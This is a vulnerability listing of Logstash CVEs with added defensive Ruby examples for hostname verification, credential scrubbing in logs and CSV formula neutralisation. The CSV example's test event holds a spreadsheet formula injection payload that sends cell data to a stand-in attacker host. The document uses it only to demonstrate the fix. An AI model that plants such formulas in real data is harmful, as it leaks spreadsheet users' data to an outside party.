CVE-2025-37730
- EPSS 0.02%
- Published 06.05.2025 17:29:07
- Last modified 07.05.2025 14:13:20
Improper certificate validation in Logstash's TCP output could lead to a man-in-the-middle (MitM) attack in “client” mode: hostname verification in the TCP output was not performed even when ssl_verification_mode => full was set, so a valid certificate for any host accepted by the trust store would pass.
CVE-2023-46672
- EPSS 0.15%
- Published 15.11.2023 08:15:07
- Last modified 13.02.2025 18:15:36
An issue was identified by Elastic whereby sensitive information is recorded in Logstash logs under specific circumstances. The prerequisites for the manifestation of this issue are: * Logstash is configured to log in JSON format https://www.el...
CVE-2021-22138
- EPSS 0.11%
- Published 13.05.2021 18:15:09
- Last modified 21.11.2024 05:49:34
In Logstash versions after 6.4.0 and before 6.8.15 and 7.12.0 a TLS certificate validation flaw was found in the monitoring feature. When specifying a trusted server CA certificate Logstash would not properly verify the certificate returned by the mo...
CVE-2019-7620
- EPSS 1.41%
- Published 30.10.2019 14:15:11
- Last modified 21.11.2024 04:48:25
Logstash versions before 7.4.1 and 6.8.4 contain a denial of service flaw in the Logstash Beats input plugin. An unauthenticated user who is able to connect to the port the Logstash beats input could send a specially crafted network packet that would...
CVE-2019-7612
- EPSS 0.48%
- Published 25.03.2019 19:29:02
- Last modified 21.11.2024 04:48:24
A sensitive data disclosure flaw was found in the way Logstash versions before 5.6.15 and 6.6.1 logs malformed URLs. If a malformed URL is specified as part of the Logstash configuration, the credentials for the URL could be inadvertently logged as p...
CVE-2018-3817
- EPSS 0.31%
- Published 30.03.2018 20:29:00
- Last modified 21.11.2024 04:06:05
When logging warnings regarding deprecated settings, Logstash before 5.6.6 and 6.x before 6.1.2 could inadvertently log sensitive information.
CVE-2015-5619
- EPSS 0.31%
- Published 09.08.2017 16:29:00
- Last modified 20.04.2025 01:37:25
Logstash 1.4.x before 1.4.5 and 1.5.x before 1.5.4 with Lumberjack output or the Logstash forwarder does not validate SSL/TLS certificates from the Logstash server, which might allow attackers to obtain sensitive information via a man-in-the-middle a...
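The three TLS entries above (CVE-2025-37730, CVE-2021-22138, CVE-2015-5619) are variations of one defect: the client either skipped certificate validation altogether or validated the chain but never bound the presented certificate to the host name it meant to reach. The following is an added example, not Logstash or Elastic code, showing the two checks as separate steps with Ruby's OpenSSL bindings (Logstash plugins are Ruby). The certificates are self-signed test fixtures constructed in the block; `make_cert`, `peer_identity_ok?` and `client_context` are names chosen for this example, and the CA path passed to `client_context` is a placeholder.

```ruby
require 'openssl'

# Constructed self-signed certificate with a given CN and optional DNS SANs.
# Test fixture for this example only; not a real Logstash/Elasticsearch cert.
def make_cert(cn, sans: [])
  key  = OpenSSL::PKey::RSA.new(2048)
  cert = OpenSSL::X509::Certificate.new
  cert.version    = 2
  cert.serial     = 1
  cert.subject    = OpenSSL::X509::Name.parse("/CN=#{cn}")
  cert.issuer     = cert.subject
  cert.public_key = key.public_key
  cert.not_before = Time.now - 60
  cert.not_after  = Time.now + 3600
  unless sans.empty?
    ef = OpenSSL::X509::ExtensionFactory.new
    ef.subject_certificate = cert
    ef.issuer_certificate  = cert
    cert.add_extension(
      ef.create_extension("subjectAltName", sans.map { |h| "DNS:#{h}" }.join(","))
    )
  end
  cert.sign(key, OpenSSL::Digest.new("SHA256"))
  cert
end

# The step the vulnerable clients skipped: bind the peer certificate to the
# host name we intended to connect to. Ruby's stdlib implements the RFC 6125
# rules (SAN dNSName entries win; CN is only consulted when no SAN is present).
def peer_identity_ok?(cert, intended_host)
  OpenSSL::SSL.verify_certificate_identity(cert, intended_host)
end

# Client context for "full" verification: VERIFY_PEER validates the chain
# against the trust store, verify_hostname makes the handshake fail on a name
# mismatch. Setting verify_mode alone is the weaker "certificate" level, which
# is what a MitM holding any trusted certificate exploits.
def client_context(ca_file = nil, full: true)
  ctx = OpenSSL::SSL::SSLContext.new
  ctx.ca_file = ca_file if ca_file   # placeholder path; loaded at handshake time
  ctx.verify_mode = OpenSSL::SSL::VERIFY_PEER
  ctx.verify_hostname = full
  ctx
end

if __FILE__ == $0
  good = make_cert("logstash.internal")
  puts "CN match:         #{peer_identity_ok?(good, 'logstash.internal')}"
  puts "CN mismatch:      #{peer_identity_ok?(good, 'attacker.internal')}"
  san = make_cert("logstash.internal", sans: ["other.internal"])
  puts "SAN overrides CN: #{peer_identity_ok?(san, 'logstash.internal')}"
end
```

The third case is the one practitioners most often get wrong when hand-rolling the check: once a certificate carries DNS SANs, a matching CN no longer counts, so a "check the CN" shortcut accepts certificates that a correct client rejects and vice versa.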
CVE-2015-5378
- EPSS 0.98%
- Published 27.06.2017 20:29:00
- Last modified 20.04.2025 01:37:25
Logstash 1.5.x before 1.5.3 and 1.4.x before 1.4.4 allows remote attackers to read communications between Logstash Forwarder agent and Logstash server.
CVE-2016-1000221
- EPSS 0.75%
- Published 16.06.2017 21:29:00
- Last modified 20.04.2025 01:37:25
In Logstash prior to version 2.3.4, the Elasticsearch Output plugin would log HTTP Authorization headers to file; those headers could contain sensitive information such as Basic credentials.
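CVE-2023-46672, CVE-2019-7612, CVE-2018-3817 and CVE-2016-1000221 are all the same failure mode: a configuration value (a URL with embedded credentials, an Authorization header, a deprecated-setting value) reaches a log line unscrubbed, and in CVE-2019-7612 it is precisely the malformed URL, the one a parser rejects, that gets echoed in the error. The following is an added example, not Logstash code, of a log-side scrubber that handles that edge: it strips userinfo from parseable URLs with the stdlib parser and falls back to a regex when parsing fails, and it redacts well-known secret-bearing keys before the event is serialised as JSON. The key list, the `***` marker and the function names are this example's own choices.

```ruby
require 'uri'
require 'json'

REDACTED = "***".freeze

# Userinfo in an authority: everything between "//" and "@" that is not a
# slash or whitespace. Used only when URI.parse rejects the input, because a
# malformed URL is exactly what ends up inside an error message.
USERINFO_RE = %r{(?<=//)[^/@\s]+@}

# Keys whose values are never logged (case-insensitive). Extend per deployment.
SENSITIVE_KEYS = /\A(authorization|proxy-authorization|cookie|password|passwd|secret|api[_-]?key|token)\z/i

# Remove credentials from a URL whether or not it is well-formed.
def redact_url(url)
  uri = URI.parse(url)
  if uri.userinfo
    uri.user = REDACTED
    uri.password = nil
  end
  uri.to_s
rescue URI::InvalidURIError
  # Parser gave up (the CVE-2019-7612 situation); scrub textually instead of
  # logging the raw string.
  url.gsub(USERINFO_RE, "#{REDACTED}@")
end

# Recursively scrub a log payload: sensitive keys are replaced wholesale,
# strings that contain URLs have their credentials stripped.
def scrub(value)
  case value
  when Hash
    value.each_with_object({}) do |(k, v), out|
      out[k] = k.to_s.match?(SENSITIVE_KEYS) ? REDACTED : scrub(v)
    end
  when Array
    value.map { |v| scrub(v) }
  when String
    value.include?("://") ? value.gsub(%r{\S+://\S+}) { |u| redact_url(u) } : value
  else
    value
  end
end

# JSON log line with scrubbing applied to both the message and extra fields.
def log_json(level, message, fields = {})
  JSON.generate({ "level" => level, "message" => scrub(message) }.merge(scrub(fields)))
end

if __FILE__ == $0
  # Constructed inputs resembling what an output plugin might log on failure.
  puts redact_url("https://elastic:changeme@es.example:9200/_bulk")
  puts redact_url("http://admin:s3cret@es host:9200/")   # not parseable
  puts log_json("ERROR", "request to https://elastic:changeme@es.example:9200/_bulk failed",
                { "headers" => { "Authorization" => "Basic ZWxhc3RpYzpjaGFuZ2VtZQ==" } })
end
```

Scrubbing at the logging boundary rather than at each call site is the point: the CVEs above came from individual code paths (a deprecation warning, a URL parse error, an HTTP client dump) that nobody thought of as secret-handling code.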
CVE-2016-1000222
- EPSS 0.35%
- Published 16.06.2017 21:29:00
- Last modified 20.04.2025 01:37:25
In Logstash prior to version 2.1.2, the CSV output can be attacked via engineered input that creates malicious formulas in the CSV data (CSV/formula injection): a field value beginning with a formula character is written verbatim and is evaluated when the file is opened in a spreadsheet.
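The CSV output entry describes the attacker-controlled side (a log field is whatever the remote client sent) but not the mitigation. The following is an added example, not the logstash-output-csv plugin's code, of the write-side neutralisation a CSV output needs: any cell whose first non-blank character is `=`, `+`, `-` or `@` (or that starts with a tab or carriage return) is prefixed with a single quote so spreadsheets treat it as text, with plain numbers exempted so numeric columns stay numeric. The event hash, field list and the `spreadsheet_safe:` flag name are constructed for this example.

```ruby
require 'csv'

# Characters that make common spreadsheets evaluate a cell as a formula.
FORMULA_PREFIXES = %w[= + - @].freeze

# Return the value as a string that a spreadsheet will not interpret.
def neutralize_formula(value)
  return nil if value.nil?          # keep empty fields empty
  s = value.to_s
  return s if s.empty?
  # Plain numbers also start with + or -; leave them alone so "-42" is still a
  # number in the sheet. This is the deliberate trade-off of the approach.
  return s if s.match?(/\A\s*[+-]?\d+(\.\d+)?\s*\z/)
  # Spreadsheets trim leading whitespace before deciding whether a cell is a
  # formula, so look at the first non-blank character. A leading tab or CR is
  # itself a trigger in some importers, so check the raw string for those.
  first = s.lstrip[0]
  if FORMULA_PREFIXES.include?(first) || s.start_with?("\t", "\r")
    "'" + s
  else
    s
  end
end

# Serialise one event to a CSV row. CSV.generate_line handles the quoting of
# separators, quotes and newlines; neutralize_formula handles the spreadsheet
# problem, which CSV quoting does not solve (a quoted "=1+1" still evaluates).
def to_csv_row(event, fields, spreadsheet_safe: true)
  cells = fields.map { |f| event[f] }
  cells = cells.map { |c| neutralize_formula(c) } if spreadsheet_safe
  CSV.generate_line(cells)
end

if __FILE__ == $0
  # Constructed event: the message field is attacker-supplied log content.
  event  = { "host" => "10.0.0.1", "message" => '=HYPERLINK("http://attacker.example/?"&A1,"Open")' }
  fields = %w[host message]
  print to_csv_row(event, fields, spreadsheet_safe: false)   # vulnerable
  print to_csv_row(event, fields)                            # neutralised
end
```

Neutralising on output is the right layer because the values arrive from untrusted clients through many inputs; the check is cheap and, apart from the numeric exemption, does not need to understand the data.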